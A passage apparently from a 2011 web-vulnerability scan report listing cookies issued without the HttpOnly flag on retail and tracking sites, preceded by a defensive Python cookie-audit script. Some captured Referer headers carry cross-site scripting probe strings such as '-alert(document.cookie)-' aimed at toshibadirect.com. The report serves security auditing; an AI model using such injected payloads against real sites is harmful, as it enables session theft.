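# section of the report (secure.bluenile.com/favicon.ico, finding 13.19, and
# tracking.searchmarketing.com/welcome.asp, finding 13.22).
SAMPLE_RESPONSES = {
    "https://secure.bluenile.com/favicon.ico":
        "HTTP/1.1 200 OK\r\n"
        "Date: Mon, 16 May 2011 02:09:02 GMT\r\n"
        "Set-Cookie: JSESSIONID=EA10D33975247F9BC51C69DD0D98B7B9; Path=/; Secure\r\n"
        "Content-Length: 1406\r\n"
        "\r\n",
    "http://tracking.searchmarketing.com/welcome.asp":
        "HTTP/1.1 200 OK\r\n"
        "Server: Microsoft-IIS/6.0\r\n"
        "Set-Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&SMCID=335; "
        "expires=Tue, 14-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/\r\n"
        "Set-Cookie: ASPSESSIONIDQQCDBDDC=GGABBBEAJKJGPEAHHBLHBFPE; path=/\r\n"
        "Content-Type: image/GIF\r\n"
        "\r\n",
}

# Assumed name heuristic for "looks like a session/auth token". This is an
# approximation chosen for the example, not the scanner's own rule.
SESSION_NAME_RE = re.compile(r"sess|sid|token|auth|login", re.I)


def parse_set_cookies(raw_response: str) -> List[Dict[str, object]]:
    """Return one record per Set-Cookie header in the response head: cookie
    name, value, and whether the HttpOnly and Secure attributes are present.
    Attribute names are matched case-insensitively, as browsers do."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    records = []
    for line in head.split("\r\n"):
        if not line.lower().startswith("set-cookie:"):
            continue
        # Split on ';' only: Expires values contain ',' and ':' but never ';'.
        pieces = [p.strip() for p in line.split(":", 1)[1].split(";")]
        name, _, value = pieces[0].partition("=")
        attrs = {p.split("=", 1)[0].lower() for p in pieces[1:] if p}
        records.append({
            "name": name,
            "value": value,
            "httponly": "httponly" in attrs,
            "secure": "secure" in attrs,
        })
    return records


def audit_cookies(url: str, raw_response: str) -> List[Dict[str, object]]:
    """Apply the report's check: flag cookies issued without HttpOnly and, on an
    HTTPS origin, also those issued without Secure; mark session-looking names
    so a reviewer can prioritise them."""
    findings = []
    https = url.lower().startswith("https://")
    for c in parse_set_cookies(raw_response):
        issues = []
        if not c["httponly"]:
            issues.append("missing HttpOnly")
        if https and not c["secure"]:
            issues.append("missing Secure on HTTPS origin")
        if issues:
            findings.append({
                "name": c["name"],
                "issues": issues,
                "session_like": bool(SESSION_NAME_RE.search(str(c["name"]))),
            })
    return findings


def audit_all(responses: Dict[str, str]) -> Dict[str, List[Dict[str, object]]]:
    """Run audit_cookies over a {url: raw_response} map."""
    return {url: audit_cookies(url, raw) for url, raw in responses.items()}


if __name__ == "__main__":
    for url, findings in audit_all(SAMPLE_RESPONSES).items():
        print(url)
        for f in findings:
            tag = "SESSION-LIKE " if f["session_like"] else ""
            print(f"  {tag}{f['name']}: {', '.join(f['issues'])}")
```

Run against a proxy's saved responses, the script reproduces the per-URL lists in this section; the session_like flag is what separates a tracking cookie such as SM from the ASPSESSIONID cookie that actually carries the server-side session.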

13.20. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.homedepot.ca
Path:   /webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: WCS_UNIQUE_ID, WC_SESSION_ESTABLISHED, WC_ACTIVESTOREDATA, WC_AUTHENTICATION_-1002, WC_USERSESSION_-1002 and JSESSIONID. Of these, JSESSIONID, WC_AUTHENTICATION_-1002 and WC_USERSESSION_-1002 appear by name to contain session or authentication tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function. Note also that only WC_AUTHENTICATION_-1002 carries the Secure attribute, although the page is served over HTTPS; JSESSIONID and WC_USERSESSION_-1002 will be sent to the .homedepot.ca domain over plain HTTP as well.

Request

GET /webapp/wcs/stores/servlet/UserRegistrationForm?langId=-15&storeId=10051&catalogId=10051&new=Y HTTP/1.1
Host: secure.homedepot.ca
Connection: keep-alive
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=989860238041728; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.2.10.1305510002; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; fsr.s={"v":1,"rid":"1305510029454_909320","to":5,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510812715}; s_v14=English; s_sq=homedepotca%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.homedepot.ca%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FUserRegistrationForm%25253FlangId%25253D-15%252526storeId%25253D10051%252526%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 16 May 2011 02:10:38 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: WCS_UNIQUE_ID=HCa6Eud8L9hN21YyVUS%2bHaSDQgY%3d%0a; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_ACTIVESTOREDATA=%2d15%2c10051; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2crW6rzz%2fYGsIblj6FaaWMw7l8O7Y%3d; Path=/; Domain=.homedepot.ca; Secure
Set-Cookie: WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; Path=/; Domain=.homedepot.ca
Set-Cookie: JSESSIONID=0001VzTy5fzfDUHAYcFBVD3sOyb:-4C1Q63; Path=/
Cache-Control: no-store, no-cache
Expires: 0
Pragma: no-cache
Content-Length: 75346


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...

13.21. http://t.p.mybuys.com/webrec/wr.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID (Path=/webrec) and mbc. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function. The mbc cookie is first expired and then re-issued with the same value and an expiry in 2079, which marks it as a long-lived tracking identifier rather than a session token.

Request

GET /webrec/wr.do?client=FTD&sessionId=129049F1-9E12-5C65-0540-FAB5539F48D0&pt=h&mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457&lang=en&v=4.7.3&mbts=1305510812851&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=51654E8D34B839005773ACAD4995CED6; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=121DDBF01A174938896EB120A64A3127; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:07:43 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 34

<html>
<body>
</body>
</html>

13.22. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: SM and ASPSESSIONIDQQCDBDDC. The ASPSESSIONID cookie is the classic ASP session identifier and so contains a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=335&x= HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A43%3A18+PM&SMCID=208

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A53%3A40+PM&SMCID=335; expires=Tue, 14-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDQQCDBDDC=GGABBBEAJKJGPEAHHBLHBFPE; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.23. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ASPSESSIONIDQSCCCBAC. The cookie is the classic ASP session identifier and so contains a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function. The request already carries nine ASPSESSIONID* cookies with different suffixes, one per ASP application instance that has issued a session; none of them is HttpOnly.

Request

GET /welcome.asp?SMCID=40000710&x=http%3A//burp/show/3 HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD; ASPSESSIONIDSQCDADBB=ONFBGAEAPGGGGFKJHHAKHFAK; ASPSESSIONIDQARCABAD=FPOPCJHAPDLDILBAKAIDENAK; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A23%3A37+AM&SMCID=40000710; ASPSESSIONIDSASDDCDB=MOHICLHANAOKJIJNBEMAPPKP; ASPSESSIONIDSQCBADBD=MEGJHKHABODBOAELGBOKJDAP

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:41:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDQSCCCBAC=AELLEKHANGAPFICNHMGNHGJD; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.24. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: SM and ASPSESSIONIDQQDDBDAA. The ASPSESSIONID cookie is the classic ASP session identifier and so contains a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=40000710&x=http%3A//burp/show/2 HTTP/1.1
Host: tracking.searchmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:41:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=2d4775d4%2Dfb95%2D4d54%2D9930%2D925441f9d73b&AID=&LastVisitDate=5%2F16%2F2011+6%3A41%3A30+AM&SMCID=40000710; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDQQDDBDAA=GHNAELHAJPJIDCMAHKGCBJKA; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.25. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: SM and ASPSESSIONIDSQBAADBD. The ASPSESSIONID cookie is the classic ASP session identifier and so contains a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=40000710&x= HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A53%3A39+PM&SMCID=335; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A53%3A56+PM&SMCID=40000710; expires=Tue, 14-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDSQBAADBD=MGEOBAEACJECNMADMMAOBPAK; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.26. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ASPSESSIONIDQSBDDAAD. The cookie is the classic ASP session identifier and so contains a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=40000710&x=http%3A//www.toshibadirect.com/td/b2c/laptops.to%3Fpage%3DsegHHO HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD; ASPSESSIONIDSQCDADBB=ONFBGAEAPGGGGFKJHHAKHFAK; ASPSESSIONIDQARCABAD=FPOPCJHAPDLDILBAKAIDENAK; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A23%3A37+AM&SMCID=40000710; ASPSESSIONIDSASDDCDB=MOHICLHANAOKJIJNBEMAPPKP; ASPSESSIONIDSQCBADBD=MEGJHKHABODBOAELGBOKJDAP

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDQSBDDAAD=EBEEKPHAJPEKOEANAOKLBJBP; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.27. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ASPSESSIONIDSQBBACAC. The cookie is the classic ASP session identifier and so contains a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=208&x=http%3A//burp/show/10 HTTP/1.1
Host: tracking.searchmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
Cookie: SM=GUID=496d877e%2Dbdb1%2D4dc3%2Da1b7%2D642ba750094b&AID=&LastVisitDate=5%2F16%2F2011+6%3A52%3A53+AM&SMCID=208; ASPSESSIONIDQQDDACAB=IBBDALHAJPIOCDKLGEGILEKL; ASPSESSIONIDSQBBCDAB=CCDJOAIAGEOOOLFLLHMIPMJD

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:55:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDSQBBACAC=IMKLNPHAIHANNJOKPAINKDNO; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.28. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: SM and ASPSESSIONIDSCTDCCCA. The ASPSESSIONID cookie is the classic ASP session identifier and so contains a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=208&x=http%3A//burp/show/8 HTTP/1.1
Host: tracking.searchmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?rdir=1A
Cookie: SM=GUID=496d877e%2Dbdb1%2D4dc3%2Da1b7%2D642ba750094b&AID=&LastVisitDate=5%2F16%2F2011+6%3A41%3A29+AM&SMCID=40000710; ASPSESSIONIDQQDDACAB=IBBDALHAJPIOCDKLGEGILEKL

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:52:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=496d877e%2Dbdb1%2D4dc3%2Da1b7%2D642ba750094b&AID=&LastVisitDate=5%2F16%2F2011+6%3A52%3A54+AM&SMCID=208; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDSCTDCCCA=HHFGMAIAGMMLMIPCCOJGPAAI; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.29. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: SM and ASPSESSIONIDSASDDCDB. The ASPSESSIONID cookie is the classic ASP session identifier and so contains a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=40000710&x= HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD; ASPSESSIONIDSQCDADBB=ONFBGAEAPGGGGFKJHHAKHFAK; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A16%3A29+AM&SMCID=208; ASPSESSIONIDQARCABAD=FPOPCJHAPDLDILBAKAIDENAK

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:34:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A34%3A12+AM&SMCID=40000710; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDSASDDCDB=PHOJCLHAAKDHGJHMGAIOEMIH; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.30. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: SM and ASPSESSIONIDSCTADBAC. The ASPSESSIONID cookie is the classic ASP session identifier and so contains a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=110&x= HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD; ASPSESSIONIDSQCDADBB=ONFBGAEAPGGGGFKJHHAKHFAK; ASPSESSIONIDQARCABAD=FPOPCJHAPDLDILBAKAIDENAK; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A23%3A37+AM&SMCID=40000710; ASPSESSIONIDSASDDCDB=MOHICLHANAOKJIJNBEMAPPKP; ASPSESSIONIDSQCBADBD=MEGJHKHABODBOAELGBOKJDAP; ASPSESSIONIDQSBDDAAD=EBEEKPHAJPEKOEANAOKLBJBP; ASPSESSIONIDSSABBDDC=HEBHOOHAABLOMBLEIKLLKIBH

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A47%3A15+AM&SMCID=110; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDSCTADBAC=JAHNNOHACCPGBOKOALHMMABP; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.31. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: SM and ASPSESSIONIDQSDCCAAC. The ASPSESSIONID cookie is the classic ASP session identifier and so contains a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=208&x=http%3A//app.gnc.com/profile/profile.cfm HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/community/index.jsp%20%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A53%3A46+PM&SMCID=40000710; ASPSESSIONIDSQCDADBB=ONFBGAEAPGGGGFKJHHAKHFAK

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:30 GMT
